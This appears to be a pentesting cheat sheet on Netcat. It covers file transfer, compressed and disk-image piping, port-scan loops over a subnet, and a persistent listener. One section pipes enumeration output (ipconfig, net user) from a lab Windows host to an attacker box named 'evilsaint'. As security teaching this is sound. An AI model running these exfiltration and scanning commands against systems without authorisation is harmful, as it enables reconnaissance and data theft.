Netcat

First some brief points about Netcat - All official versions are free of charge - Works natively on Linux. - Works natively on Apple Mac OS X. - Works natively on Microsoft Windows. - Features a command-line interface. - Source code available for inspection. - General-purpose tools - Packet crafting tools

The ncat tool is a much better option in place of netcat or nc.

We think ncat is better because of its support for multiple protocols and simultaneous connections and SSL.

Overview

This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.

Netcat can operate in environments where you have low privileges, plus it is a standalone binary, meaning you can upload it to an environment and run it as is. Be warned that file transfers using Netcat are not encrypted, anyone on the network can grab what you are sending, so use this only on trusted networks.

Standard Listen and Send

setup netcat in listening mode and save whatever is received to in.txt

root@box:/tmp/netcat# nc -w 1 -l -p 3000 > in.txt

From the sending end, we can pipe in a file called out.txt and send it to our listener.

nc -w 3 [destination] 3000 < out.txt

Piping input

We can send data by sending output through a pipe to Netcat. Here we are outputting a file, but it could be several items.

C:\Documents and Settings\user> type c:\test.txt | c:\nc.exe 192.168.2.8 3000 -w1

On our kali box, we can set a while loop like follows.

root@evilsaint:/pentesting/enum# while true; do nc -w 4 -lvp 4321 >> enum.txt; done

And we can pipe enumeration commands back to our box.

C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>ipconfig | nc64.exe 10.1.1.5 4321 -w 3
C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>net user | nc64.exe 10.1.1.5 4321 -w 3
C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>net account | nc64.exe 10.1.1.5 4321 -w 3

Send with Compression (Linux to Linux)

On the receiving end

nc -l -p 1234 | uncompress -c | tar xvfp -

On the sending end

tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234

Sending a harddrive

It is possible using Netcat to pipe a hardrive

On the sender end run

dd if=/dev/hda3 | gzip -9 | nc -l 3333

On the receiver end,

nc [destination] 3333 | pv -b > hd-image.img.gz

Port Scanning with Netcat

TCP scan of ports 3385 to 3395

nc -nvv -w 1 -z 10.0.0.1 3385-3395

UDP scan of ports 3385 to 3395

nc -unvv -w 1 -z 10.0.0.1 3385-3395

Small Bash Loop to loop through all the ports from 1 to 65535 for one IP

for i in $(seq 1 65535); do nc -nv -w 1 -z 10.0.0.1 $i ; done

Small Bash Loop to loop through all the IPs on our subnet and scan for ports 21-25

for i in {1..254}; do nc -vv -n -w 1 10.0.0.$i 21-25 -z; done

Makeshift Permanent Netcat Listener

nohup is a program you can use to run your application with such that its stdout/stderr can be sent to a file instead and such that closing the parent script won’t SIGHUP the child. However, you need to have the foresight to use it before starting the application. Because of how nohup works, you can’t just apply it to a running process.

disown is a bash builtin that removes a shell job from the shell’s job list. This means that you can’t use fg, bg on it anymore, but more importantly, when you close your shell, it won’t hang or send a SIGHUP to that child anymore. Unlike nohup, disown is used after the process has been launched and backgrounded.

Make a Netcat listener persistent.

while(1) nohup netcat -lvp 4444